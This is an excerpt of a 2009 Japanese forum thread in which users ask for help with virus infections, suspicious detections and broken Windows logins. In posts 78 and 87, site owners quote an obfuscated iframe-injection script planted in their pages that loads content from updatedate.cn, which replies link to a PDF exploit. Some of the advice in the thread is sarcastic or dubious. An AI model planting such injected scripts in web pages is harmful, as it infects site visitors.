今の所なにも困ってません
あんまり重要なものじゃなさそうなのでそのままsens.dllを削除しちゃっていいですか?
59:53
09/07/02 16:47:21
>>54
SUPERAntiSpywareでスキャンしたとろこCookieが100個ぐらい検出されて削除したのですが
クッキー程度で起動時に変なアイコン表示されたりするのでしょうか?
マルウェアの具体的な詳細知りたいのですが検索のヒントになるようなキーワード覚えてないでしょうか?
60:名無しさん@お腹いっぱい。
09/07/04 03:08:28
>>58
ん。ちとマズイなその感染は。
修復できないならリカバリ。
URLリンク(detail.chiebukuro.yahoo.co.jp)
Sens.dllがなくなるとこうなる
URLリンク(okwave.jp)
61:名無しさん@お腹いっぱい。
09/07/04 13:23:46
>>60
回答ありがとうございます
一つのアカウントしかないので無理やり削除することにしました
62:名無しさん@お腹いっぱい。
09/07/07 02:07:43
ちょっと教えてもらいたいのですが、
1週間前のことですが、DVDのトレーがたまに開閉するようになり、
ノイズかなんかかなぁぐらいで放置していましたが、
2日目位からネットの接続が遅くなり、グーグルは開けますが、ヤフーを開くと固まってしまう状態でした。
なんか怖くなり、トレンドマイクロのオンラインでスキャンしましたが、何も出ず
SPYBOTでスキャンしたところダブルクリックのスパイウェアが1個出てきただけでした。
ブラウザの表示が困難になったので、ママンを変えるついでにVISTAを再インスコしたら
直ったので事なきを得たのですが、これは何かのウイルスに感染していたのでしょうか?
または、ママンの故障なのでしょうか?SSD、メモリは流用したので壊れてはいませんでした。
申し訳ないのですが、何かおわかりになられる方がいらっしゃいましたらご教授願います。
お願いいたします。
63:62
09/07/07 02:09:45
DVDも流用しましたが、壊れていませんでした。
64:名無しさん@お腹いっぱい。
09/07/07 23:33:13
scrのファイル踏んでしまった
ファイルのほとんどがT605の拡張子で237kbになってしまった
ほんとにファイルはあぼーんになったの?
どうすればいい?
助けてください。
65:名無しさん@お腹いっぱい。
09/07/08 02:19:06
トレンドマイクロのオンラインスキャンを
始めようとすると、サービスを開始できません。とでるのですが
どうしてでしょうか?以前は問題なくできていたのですが・・・
OSはVISTA HEデス
66:名無しさん@お腹いっぱい。
09/07/08 04:45:21
>>64
そんなウィルスあるの?
こわい。
67:名無しさん@お腹いっぱい。
09/07/08 12:17:38
>>64
ファイルは消えた。OS再インストール
68:名無しさん@お腹いっぱい。
09/07/08 20:09:15
というか、そういうデータ破壊系のものが
昔からあるウイルスなんだが。
スパイじみた挙動を見せるタイプは最近になって増えたらしい。
69:名無しさん@お腹いっぱい。
09/07/12 13:35:17
src踏みました
フォルダ内の動画が画像ファイルに上書きされるのを見て
とにかく強制終了、再起動してもウィンドウズが立ち上がらないので
ウィンドウズを再インストール
なんとか起動後、デスクトップ画面は普通で
まずOSとは別のパーテーションにあるミュージックフォルダを確認
各アーティスト毎のフォルダ内は一見無事に見えましたが、
確認してる内にどんどん画像ファイルに上書きされてました・・・
そこでまたあせって強制終了、また立ち上がらなくなりました。
Cドライブだけ初期化して
別のパーテーションを残しても、ウィルスは残ってますかね?
やはり全ての初期化しか方法は無いでしょうか
70:名無しさん@お腹いっぱい。
09/07/12 13:36:31
すいませんsrcじゃなくscrでした
71:名無しさん@お腹いっぱい。
09/07/12 13:46:42
>やはり全ての初期化しか方法は無いでしょうか
うん
72:名無しさん@お腹いっぱい。
09/07/12 15:13:14
>>69
ウイルス対策ソフトいれててもscr踏むとそうなっちゃうの?
もしそうなら怖いね。
>>
>うん
役立たずすぎてワロタ
73:名無しさん@お腹いっぱい。
09/07/12 16:13:54
ファイル(レジストリ含む)を書き換えられたらどうしようもない
HIPSで防ぐしかないだろ
74:名無しさん@お腹いっぱい。
09/07/15 23:09:22
質問です。
私のウイルスセキュリティZEROたんがトロイを数匹見つけるほど末期なパソコン状態です。
せっかくウイルスバスターを買ったのですが、試供品を別のパソコンで使ってるので
それが終わってからにしようとたらたらしていたらどんどんひどいことになっています。
昨日くらいから、マイコンピュータを開くと問答無用で応答無し→送信しますか?状態になります
これを、マイピクチャからフォルダを選択したらCドライブの中とか外付けの中に逝くことはできます
こういう現象はウイルスのせいでしょうか?
僕はどうしたらいいでしょうか?
よろしくお願いします。
75:名無しさん@お腹いっぱい。
09/07/15 23:25:45
まるち
76:名無しさん@お腹いっぱい。
09/07/16 01:41:58
はわわ
77:名無しさん@お腹いっぱい。
09/07/16 04:20:51
きれいな水ですから…
78:名無しさん@お腹いっぱい。
09/07/16 19:05:32
HPを勝手にいじられました
中にあったのは
script
document.write("<"+"i"+"f"+"rame
src=http:"+"//upda"+"t"+"edat"+"e."+"c"+"n/"+" height=1
width"+"=1"+">"+"</if"+"ram"+"e>");
/script
"や+をはぶくと
updatedate.cn/
ですが、どんなウィルスでしょう?
79:名無しさん@お腹いっぱい。
09/07/16 19:08:35
PDF系じゃないだろうか……
80:78
09/07/16 19:32:33
>>79
ありあがとうございます
素人ですみません
PDF系とはナンでしょうか?
パスワードを変えても
すぐHPをいじられてしまいます。
81:名無しさん@お腹いっぱい。
09/07/16 19:58:02
クリーンインストール推奨。
終わったらパスワード変更も忘れずに。
82: ◆N9P3SuvBPo
09/07/16 21:26:02
>80
ちなみに、そのupdatedate.cnのソース(難読化されたScript)の、VirusTotalのスキャン結果
URLリンク(www.virustotal.com)
83:名無しさん@お腹いっぱい。
09/07/16 21:34:33
私も>>78と同じ事になっています
一体どういう事が起こっているんでしょうか…
クリーンインストールというと、やはりウィルスなんですか?
私はFTPを使っています。
アップロード直後はそのソースは出ないんですけど…
84: ◆N9P3SuvBPo
09/07/16 21:48:32
どうやら、>>79の言う通りPDFを落させようとしますね…はい。
そのPDFファイルのソースが取れたので、VirusTotalに掛けようとしたら
「ファイルはすでに解析されてる」と出ました。結果です。
URLリンク(www.virustotal.com)
85:八頭 ◆YAGApwSaEw
09/07/16 22:36:46
このテのタイプだろうね
Exploit-PDF.b.gen ウイルス情報 マカフィー
URLリンク(www.mcafee.com)
情報だけシマに渡しておいた
86:名無しさん@お腹いっぱい。
09/07/16 23:55:12
>updatedate.cn
Adobe Readerの旧版にある脆弱性を突くPDFファイルを読み込ませて、
ウイルスを起動させる。(GENOウイルスと同じ)
FTPパスを抜くウイルスに感染してるとか?
87:83
09/07/18 13:00:40
でもFTPを使わないで
直接借りてるサーバー(FC2無料)からアップロードしても
数時間後にはそのタグが出てるんですよね。
私の所のタグでは、
<script>document.write("<iframe" +" sr"+"c=h" +"t"+"URLリンク(delzz)<) と h URLリンク(updatedate.cn)
ウィルスだとしたら、どう対処したらいいんですかね…
調べても上がってこなくって、結構焦ってます。
88:名無しさん@お腹いっぱい。
09/07/19 11:07:13
IPA 情報処理推進機構:情報セキュリティ:脆弱性対策:SQLインジェクション検出ツール
URLリンク(www.ipa.go.jp)
IPA 情報処理推進機構:情報セキュリティ:脆弱性対策:安全なウェブサイト運営入門
URLリンク(www.ipa.go.jp)
IPA 情報処理推進機構 (情報セキュリティに関する届出)
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
URLリンク(www.ipa.go.jp)
89:名無しさん@お腹いっぱい。
09/07/19 11:17:27
C:\Program Files (x86)\Windows Live\Photo Gallery\WLXPhotoAcquireWizard.exe
Windows7x64でAvast!つかってるんだが、昨日の定義で上記のexeがウィルスとして検出されるようになったんだが、
これって誤爆じゃないの?
90:名無しさん@お腹いっぱい。
09/07/20 01:34:24
winnyをよくやってるんですが、winnyみたいに日本でしか使われていないソフトに発生する
ウイルスって、海外製のウイルス対策ソフトの対応度合いってどうなんでしょうか?
winnyやるなら国産の(といってもウイルスバスターしかないのかしら?)の方が良いでしょうか?
アホみたいな質問で済みません・・。
91:名無しさん@お腹いっぱい。
09/07/20 16:39:10
やめたほうがいいな
92:名無しさん@お腹いっぱい。
09/07/20 17:23:43
comodo使ってるんですが
Firefoxを開いただけで送信接続数が600とかになることがあります
なにかトロイにでも感染したんでしょうか?
93:名無しさん@お腹いっぱい。
09/07/21 17:09:17
フレッツウィルスクリアでTROJ Gen.4X2633が検出されたんですがこれはなんなんでしょう?
94:名無しさん@お腹いっぱい。
09/07/21 17:41:22
>>93
TROJ Gen.4X2633
95:名無しさん@お腹いっぱい。
09/07/22 02:12:28
【使用OS】 『XP sp3』
【PCスペック】 『CPU: 3.00GHz 、メモリ: 1.96GB』
【使用ブラウザ】 『IE』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『ウイルスバスター 2009』
【その他スパイウェア対策ソフト】 『ウイルスバスター 2009』
【回線の種類・ルータの有無】 『光回線でルータ使用』
【具体的な症状】
ファイアフォックス起動時に一瞬小さいウインドウの残像?が見える
気になってカペルスキーオンラインスキャンをしたら
C:\Program Files\Trend Micro\Virus Buster\Quarantine\195.tmp
がTrojan-PSW.Win32.Nilage.djlに感染しているとでました。
C:\Program Files\Trend Micro\Virus Buster\Quarantineを開いても
195.tmpというファイルが見つかりません。
ファイアフォックス起動時に一瞬小さいウインドウの残像?が見えるのと
このウィルスは関係がありますか?
駆除するには再セットアップでしょうか?
96:名無しさん@お腹いっぱい。
09/07/22 02:23:31
>>95
OTL
URLリンク(oldtimer.geekstogo.com)
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行します
上段にある「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストが自動的に保存されています
RootRepeal - Rootkit Detector
URLリンク(rootrepeal.googlepages.com)
RootRepealの最新バージョンをデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブになっています)
ログ抽出走査が停止したら、
「RootRepeal report.Txt」がメモ帳で開いて、C:にテキストが自動的に保存されています
OTLとRootRepealのログを新規フォルダにコピー&ペーストしてから、フォルダを圧縮
件名とフォルダ名をを、「[ Report ] - Infection log report」として以下へ送信
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
URLリンク(submit.symantec.com)
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポート で調査依頼の提出が出来ます
これでワクチンが作られるので、次回のパターンファイル更新で対応されますw
97:名無しさん@お腹いっぱい。
09/07/22 02:32:16
>>96は何を勘違いしてるのか。
ウイルスバスター を 使ってる人に ウイルスバスター と 関係の無い シマンテック社に
訳の分からんもん送れって アホか。
ノートン が 対応しても ウイルスバスター は 対応しませんよね。
意味のないことするな!
あと そんな怪しげなファイル 使わねーって。
98:名無しさん@お腹いっぱい。
09/08/13 23:21:27
ドライバをランダムに削除するウィルスってあるんですか?
ググっても出てこないんですが。
99:名無しさん@お腹いっぱい。
09/08/14 01:44:00
他スレの書き込み。
"OTL.exe"は、McAfeeでは、「検出済み: Artemis!3974A453958C (トロイの木馬)」
となって、DL出来ないよ。一時的にシールド外せばDLして調べることも出来るけど、やめた。
"OTL.exe"をVTでスキャンすると
CAT-QuickHeal 10.00 2009.08.04 (Suspicious) - DNAScan
eSafe 7.0.17.0 2009.08.03 Suspicious File
McAfee+Artemis 5697 2009.08.03 Artemis!3974A453958C
McAfee-GW-Edition 6.8.5 2009.08.04 Heuristic.LooksLike.Win32.Suspicious.C!83
Sophos 4.44.0 2009.08.04 Mal/Emogen-Y
で検出されたが
100:八頭 ◆YAGApwSaEw
09/08/15 03:59:23
>>99
URLリンク(www.virustotal.com)
CAT-QuickHealとSophosが定義修正してるから
McAfeeに連絡しておいた方がいいよ
eSafeは連絡しても修正してくれないから放っておけw
101:八頭 ◆YAGApwSaEw
09/08/15 04:17:29
>>99
100は旧バージョンの結果だったスマンヌ
旧OTL File size: 501760 bytes
URLリンク(www.virustotal.com)
現OTL File size: 514048 bytes
URLリンク(www.virustotal.com)
102:名無しさん@お腹いっぱい。
09/08/17 22:00:45
なんだもう1001になったのか
103:名無しさん@お腹いっぱい。
09/08/18 19:52:40
PC初心者なんだけど、ファイル共有ソフト使ってなければ
ファイルとか画像が勝手に流出することはないの?
104:名無しさん@お腹いっぱい。
09/08/18 20:31:16
>>103
そんなことないよ。
ウィルスに感染してバックドアしかけられたら、気づかないうちにHDDの中身を抜き取られてることもある。
105:名無しさん@お腹いっぱい。
09/08/18 22:05:25
>>103
山田オルタでググってみ
106:名無しさん@お腹いっぱい。
09/08/19 09:57:44
【使用OS】 「XP home」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast 4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「AVG spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「無し」
起動時にマイドキュメントが開いてしまうので
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win!dows NT\CurrentVersion\WinlogonC:\WINDOWS\system32\userinit.exe,
に書き換えて再起動したところ、ログインしても瞬時にログオフされるようになりました。
セーフモードにしても同様です。
検索してもこの症状の人は解決には至っておらず、とても困っております。
もうリカバリーかOS再インスコしか道がないのでしょうか…
どうしても残しておきたいデータがあって…
107:名無しさん@お腹いっぱい。
09/08/19 11:31:42
>>106
OTL
URLリンク(oldtimer.geekstogo.com)
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行します
上段にある「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストが自動的に保存されています
RootRepeal - Rootkit Detector
URLリンク(rootrepeal.googlepages.com)
RootRepealの最新バージョンをデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブになっています)
ログ抽出走査が停止したら、
「RootRepeal report.Txt」がメモ帳で開いて、C:にテキストが自動的に保存されています
OTLとRootRepealのログを新規フォルダにコピー&ペーストしてから、フォルダを圧縮
件名とフォルダ名をを、「[ Report ] - Infection log report」として以下へ送信
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
URLリンク(submit.symantec.com)
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポート で調査依頼の提出が出来ます
これでワクチンが作られるので、次回のパターンファイル更新で対応されますw
108:名無しさん@お腹いっぱい。
09/08/19 11:40:52
>>107(続き)
Norton Internet Security 2009を購入します
URLリンク(a.imagehost.org)
インストール>アップグレード>スキャン
A-Squared Freeをインストール>スキャン
ここまでやればHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win!dows NT\CurrentVersion\WinlogonC:\WINDOWS\system32\userinit.exe,が正常になると思ってますw
リカバリを奨める似非回答者が現れる可能性がありますので、注意してくださいね
109:名無しさん@お腹いっぱい。
09/08/19 11:47:18
>>107
レスありがとうございます。
デスクトップにDLしようにも、デクストップが見えた瞬間くらいにログオフしてしまい、
DLができない状態です。。。
今書き込んでいるのはサブのPCからです><
110:名無しさん@お腹いっぱい。
09/08/19 11:51:01
データ吸い出したいだけならKNOPPIX等のCDで起動できるLinux使って
USBメモリ等にデータをコピー
Windowsを起動できるようにしたいなら、回復コンソールを起動して、
システムの復元領域からレジストリをコピー
でも、たぶんOS再インストールしちゃったほうが、時間が無駄にならなくてすむよ
111:名無しさん@お腹いっぱい。
09/08/19 12:09:21
>>110
やっぱり外側から何かしないといけないですよね・・・
諦めて再インスコ検討します;
112:名無しさん@お腹いっぱい。
09/08/19 15:27:04
>>110
KNOPPIXというものを検索して試行錯誤しながらバックアップしたいファイルを救出することができました!
ありがとうございました!
これから再インストールしたいと思います。
113:名無しさん@お腹いっぱい。
09/08/19 16:37:07
>>103
P2Pが原因じゃなくてウイルスが原因
P2Pやってなくても何かの拍子でウイルス踏めば駄々漏れ
114:名無しさん@お腹いっぱい。
09/08/27 09:09:19
【使用OS】Windows XP HE SP3
【Microsoft Update(MU)の状態】常に最新
【使用セキュリティソフトとバージョン】ノートンインターネットセキュリティ2009 16.7.2.10
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】Yes
【スパイウェア対策ソフト】特に無し
【ルータの有無】有り
PCの電源を切るときに、半分くらいの確率で「ccSvcHstプログラムの終了中です」「このプログラムは応答していません」と表示されます。
これ自体はノートン関連のファイルという事がわかっているのですが、問題はこのエラーが表示された際に必ずセットで表示される、以下の画像のエラーです。
URLリンク(up2.viploader.net)
「ccSvcHstプログラムの終了中です」が表示されずにすんなりと終了する時には表示されません。
必ずccSvcHstとセットになっています。
自分なりに調べてみたところn.exeはUSBウイルスだと分かったのですが、
・フォルダの設定で隠しファイルはちゃんと表示できる
・各ドライブ直下にautorun.infが無い
・Cドライブ直下にn.exeやvb8jc.exeなどが無い
など、感染している症状は見当たりませんでした。
また、PCにインストールしているノートンインターネットセキュリティ2009と
カスペルキーのオンラインスキャンを実行しましたがウイルスは発見できませんでした。
症状としては感染しているようには見えないのですが、どうしても『n』というプログラムが気になります。
これはウイルスではないのでしょうか?またウイルスだった場合、手動での確認が不可能な段階まで進行しているのでしょうか?
不安でご飯も3杯しか喉を通りません助けてください。
115:名無しさん@お腹いっぱい。
09/08/27 10:05:32
"n"ってのは必ずしもファイル名とは限らないんじゃね?
さっさとリカバリしちゃったほうが確実だしご飯がすすむと思うよ。
116:名無しさん@お腹いっぱい。
09/08/27 14:03:06
JS:ScriptIP-inf [Trj]
これ何か知ってる?
ネサフしてるとavastが何回も拾う
が、データベースに載ってもいない
117:名無しさん@お腹いっぱい。
09/08/29 18:58:50
今VAIOtypePをスタンバイから復帰させたんだけど、
その瞬間緑とオレンジのブロックが左に流れ続ける画面になってしまった。
fとかoとかがそのブロックの中に入ってたんだけど、
再起動したら戻った・・・
これってウィルス?とりあえず今からスキャンしてみる・・・
118:名無しさん@そうだ選挙に行こう
09/08/30 09:24:44
【使用OS】 「win2k_SP4」(多分)
【Microsoft Update(MU)の状態】 08/30現時点・最新
【使用セキュリティソフトとバージョン】 「AVG フリー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Downloader.Generic8.BKDE
」
トロイってことしか分からない。 危険度は恐らく低いが情報求む。
ちなみに、検出されたのは「Orbit」ってDL支援ソフトの「~net.exe」
~←なんて書いてあったか隔離した記録ごと消したから忘れてしまった。
119:名無しさん@そうだ選挙に行こう
09/08/30 09:44:20
XP使っているのですが、(それ以外よくわかりません)
1ヶ月ぐらい前にブラウザのバーが勝手に上がり下がりして変でした。
今度は、電源が勝手に消えて着いたりして、主電源も効かなくなるので
ウイルスバスターを入れてみました。
ウイルスソフトを入れると、起動が鈍くなるのでここ数年入れていなくて、
ウイルスバスターで29個の何かが検出されたのですが、
これがウイルスですか?
こういうのが、PCを壊すことはあるのでしょうか?
120:名無しさん@そうだ選挙に行こう
09/08/30 19:04:56
>>119
> ウイルスソフトを入れると、起動が鈍くなるのでここ数年入れていなくて
アンチウイルス入れないで数年使えば、どんな状態になっていてもおかしくない
あなたの言う症状がウイルスのせいか何なのか断定は出来ないが、もうまともなpcの状態じゃないと思う
121:名無しさん@お腹いっぱい。
09/08/30 22:02:29
>>119
PCが壊れる事は滅多にはないが無くは無い
一度OS入れ直す事を強く推奨
122:名無しさん@お腹いっぱい。
09/08/30 22:41:55
>>120
>>121
ありがとうございます。
電源落ちはなくなりましたが、また調子悪くなるかもしれないので、
データーだけ取ってからリカバリに挑戦してみます。
ウイルスソフトが大切だとはじめて思いました。
(数年ってもう10年近いです)
私は絶対にウイルスになんて感染しないって自信過剰でした。
123:名無しさん@お腹いっぱい。
09/08/31 03:47:32
OS XP
対策ソフト一切無しで、エッチ系サイト閲覧してたら、急にダウンロードとセットアップが始まってしまいました。
アンインストールしたけど
ネットしてたら、別ウィンドウで知らないサイトが、ピョコピョコ出るように、なりました。
Yahooメールとか見てたら頻繁に
ヤフオクのID即止めた方が良いですか?
キャノンのウイルス対策ソフトの1ヶ月体験インストールしてみたけど、感染ファイル46個削除になったけど
知らないサイトがピョコピョコは解消されません
ウイルスバスターも、入れてみたら、激重になって
何も出来ません。
助けて下さい。
124:名無しさん@お腹いっぱい。
09/08/31 05:09:14
まずアンチウイルスソフトを複数入れるのは止めろ。
体験版の多くはスキャンのみで駆除できないことがあるから、体験版を過信するのは大きな間違い。
つかバスターはザルのくせして激重だ。
それとPCにダウンロードされたのはブラウザハイジャック型のマルウエアとバックドアだと思う。
Yahoo IDや様々なネットサービスを一旦全て停止し、マルウエアやスパイウエアを駆除するソフトをインストールして、定義ファイルをUpdate後にスキャンしてみるといいよ。
SUPERAntispywareだとブラウザハイジャック防止機能もあるからオススメ。
125:名無しさん@お腹いっぱい。
09/08/31 09:21:30
>>124
ご回答ありがとうございます。
ウイルスバスターが激重で、アンインストールするのにも、即フリーズして何も出来ないんですが
修理に出した方が早いですか?
F5押しながら再起動してみたけど
フリーズ
二つの体験版が起動してすぐ動いてるからだろうけど
何か、ウイルスバスターアンインストール出来る方法ありましたら、教えて下さい。
データのバックアップも出来ません。
126:名無しさん@お腹いっぱい。
09/08/31 10:03:19
ここはいつから初心者板になったんだろう
>>123
いいか?念の為LANケーブル引っこ抜いて、セーフモードで立ち上げて
そこからアンインストール作業を試して見てダメだったら、リカバリCDでも突っ込んでから起動するんだな。
今出てきた言葉で分からない事があるならネットカフェでググるなり、本屋か図書館に行ってパソコン用語辞典調べるなりしな
即リカバリをすると無論バックアップは取れないが、自業自得だ
みんな調べたり、痛い思いしながら相応に育ってるんだ
本一冊買えば基礎知識くらいは付くんだから、それくらいしてからPCいじって欲しい
127: ◆N9P3SuvBPo
09/09/01 01:48:06
経験に勝る知識はない。
128:名無しさん@お腹いっぱい。
09/09/01 07:52:03
URLリンク(www.yamasaki-sunnet.co.jp)
ここのページ開こうとすると、
ウイルス警告出るんですけど
大丈夫ですかねぇ。
ウイルス名:HTML:IFrame-EC [Trj]
129:名無しさん@お腹いっぱい。
09/09/01 18:36:10
xp ウイルスバスターver2009 troj_generic.dit が検出されました。
IE5というフォルダ(?)にあると表示されましたが、フォルダオプションで
全てを表示させても見当たりません。
害の有無・削除方法など、教えてください。
バスタースレでは、「サポートに聞け」と、スレ存在の価値が皆無のようなことを
言われまして、こちらに来ました。よろしくお願いします。
130:名無しさん@お腹いっぱい。
09/09/01 18:55:54
インターネット一時ファイルを削除
131: ◆N9P3SuvBPo
09/09/01 20:53:45
>128
ページ内に<p class="img"><iframe frameBorder="0" allowTransparency=以下ryがあり
そのコードに反応してるんでは?と思います。
132:名無しさん@お腹いっぱい。
09/09/02 05:43:11
ウィルスに感染したらどうすればいいですかね
133:名無しさん@お腹いっぱい。
09/09/02 06:52:55
リカバリ
134:129
09/09/02 08:46:41
上記の通り、バスタースレでも質問していたところ、
誤検知ということで、無害みたいです。
>>130 ありがとう。
135:名無しさん@お腹いっぱい。
09/09/02 10:50:32
最近のゆとりーはマルチって言葉すら知らないのだろうか?と素朴な疑問
136:名無しさん@お腹いっぱい。
09/09/02 12:10:10
マルチ市ねって言っても帰ってくれないでしょ、この手の奴は
137:名無しさん@お腹いっぱい。
09/09/02 12:13:19
あと、マルチだって言われてるのに相手するバカもいるからね
自演かもしれないけど
138:名無しさん@お腹いっぱい。
09/09/02 12:45:59
>>135-137
マルチ言及厨のほうがウザ
>バスタースレでは、「サポートに聞け」と、スレ存在の価値が皆無のようなことを
言われまして、こちらに来ました。よろしくお願いします。
丁寧に説明してるからまだいいかと。
139:名無しさん@お腹いっぱい。
09/09/02 12:51:36
という自演
140:名無しさん@お腹いっぱい。
09/09/02 13:18:49
はいさらっと終わらして次いこーぜー
141:名無しさん@お腹いっぱい。
09/09/04 04:24:58
画面が時々フリーズして困っています。
特徴はフリーズした瞬間「バイーン」と音がします。
スパイウェアを仕込まれたのでしょうか?
これが何か分かる方おしえてください。
142:名無しさん@お腹いっぱい。
09/09/05 12:43:22
田代ウイルスっていうのは、田代砲のことなんですか?
イメージファイルをDVDに焼いてマウントしたら、ドライブにnamikare.netと表示されて、
自動実行の直前で食い止めたんですが、もし感染したらどんな症状がでるのでしょう?
143:名無しさん@お腹いっぱい。
09/09/06 19:15:46
パソコンのウィルスを作って、バラまいたら、
どういう法律に触れるのでしょうか?
144:名無しさん@お腹いっぱい。
09/09/06 23:16:28
初心者です。(※一応ウィルスバスター付)
ネットの履歴に
・r・・・s・・・[・^
というものがあり、行った覚えが無いのですがこれは何かのウィルスなのでしょうか?
気付いたら履歴に残っており、同時期から急に動作異常が発生しています。
もしご存知でしたら名称と対策をお願い致します。
145:八頭 ◆YAGApwSaEw
09/09/07 01:06:36
>>144
それだけではなんともいえないが
INTERNET Watch
情報処理推進機構(IPA)は3日、ブラウザの設定を改変したり、不正な機能を追加する 2009/9/3
悪質なソフトウェア「ブラウザハイジャッカー」の被害が出ているとして注意喚起した
URLリンク(internet.watch.impress.co.jp)
→ PC健康診断掲示板 (特にPCに問題は感じないが念のためチェックしてほしい方向けの診察掲示板)
スレリンク(sec板:5番)
146:名無しさん@お腹いっぱい。
09/09/11 01:34:40
Janeで2ちゃんねる見てるのですが
プロバイダ板の
「MX・ny等で帯域制限をかけるISPについて云々」
というスレを開いたら
トロイの木馬が検出されました。
スレッドを開くだけでウイルス感染する事なんてあるんでしょうか?
147:名無しさん@お腹いっぱい。
09/09/11 10:42:43
帰れ
148:名無しさん@お腹いっぱい。
09/09/11 21:41:39
家のPCが突然シャットダウンしたり一時的にインターネットに接続出来なく
なります。
他にもタブが突然増えだしたりシャットダウン出来なくなってしまいます。
一応ウイルスドクターを入れていてスキャンをしてもウィルスは検出されません。
これはPCに何か問題があるのでしょうか?
それともウィルスが入っているのでしょうか。
149:名無しさん@お腹いっぱい。
09/09/12 00:29:10
>>148
テンプレートは飾りではないのです。
>>1はまともなレスがほしいがひとが利用するテンプレ。
>>2-3は予防のについて
>>5-6はルータ無し且つリカバリした状態がXPsp1以前なら感染するマルウエア。
>>9はおまいさんの疑問への答え。
150:名無しさん@お腹いっぱい。
09/09/18 17:56:21
【使用OS】 「Windows Vista (TM) Business Professional (6.0, Build 6002 Service Pack 2)」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast4/BitDefenderコマンドライン版」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「WindowsDefender」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「無」
いつの間にか、HDD内の画像サイズの比率が滅茶苦茶になっていました。
自分でコンバートした覚えもなく、思い当たる点もありません。
フルスキャンしましたが何も検知されませんでした。
もし、HDD内の画像ファイルを破壊するようなウイルスがあったら教えてくださいm(_ _)m
サンプル↓
URLリンク(imagepot.net)
151:名無しさん@お腹いっぱい。
09/09/18 22:24:26
>>150
ファイル交換及びシェア系サイトに
壊滅的な被害をもたらすリスクが多い罠
152:名無しさん@お腹いっぱい。
09/09/19 00:08:26
梨花のオフィシャルブログを見るとadode readerが勝手に開いて、ファイルが壊れてると出て
ノートンが高リスクと表示されます。なんなんでしょうか?分かる方いらっしゃいますか?
このページです
URLリンク(www.smooche.jp)
153:名無しさん@お腹いっぱい。
09/09/19 00:11:44
>>152
エラーで表示されない
154:名無しさん@お腹いっぱい。
09/09/19 00:16:56
>>153
すいません、貼りなおしてみましたが同じですよね。
URLリンク(www.smooche.jp)
155:名無しさん@お腹いっぱい。
09/09/19 00:22:14
www.smooche.jpにアクセスしようとするとavastも怒るね
URLリンク(www.aguse.jp)で調べると
「外部にリダイレクトされています」って警告が出る
156:名無しさん@お腹いっぱい。
09/09/19 00:26:08
>>155
レスありごとうございます。ウィルスでしょうか?
ノートン2009なんですが、リスク名は「 acrobat PDF Suspicious File Downlode3」
と出てました。
157: ◆N9P3SuvBPo
09/09/19 01:04:18
>156
AVG7.5でも反応あり
あとソースを見ようとすると再びAVGが反応するので、ソースチェッカーオンラインというのを使い、
調べて見ますと、IFrameタグで悪質サイトに飛ばせようとします。
またジャンプタグで別サイトを呼びこむ仕掛けもあります。
158:名無しさん@お腹いっぱい。
09/09/19 01:13:17
>>157
レスありがとうございます。それと、ご親切に有難う。詳細が分かりましたら、教えてください。
genoウイルスってやつかな・・・。ノートンで一応「遮断しました」とは出たんですが、大丈夫かな。。
159:八頭 ◆YAGApwSaEw
09/09/19 01:49:00
>>158
シマへ報告しといたからダイジョブ
160:名無しさん@お腹いっぱい。
09/09/19 02:08:44
>>159
有難うございます
161:名無しさん@お腹いっぱい。
09/09/22 20:22:30
URLリンク(ss2music.com)
↑
このページって何かのウィルスが
組み込まれているのでしょうか?
162:名無しさん@お腹いっぱい。
09/09/22 20:32:34
うん
163:名無しさん@お腹いっぱい。
09/09/23 00:19:37
【使用OS】 Windows XP
【Microsoft Update(MU)の状態】 多分手動
【使用セキュリティソフトとバージョン】 ウィルスセキュリティZERO
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 自動更新なので多分
【スパイウェア対策ソフト】 同上
【スパイウェア対策ソフトの更新は定期的に行なっているか】 同上
【ルータの有無】 多分ある
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャン中
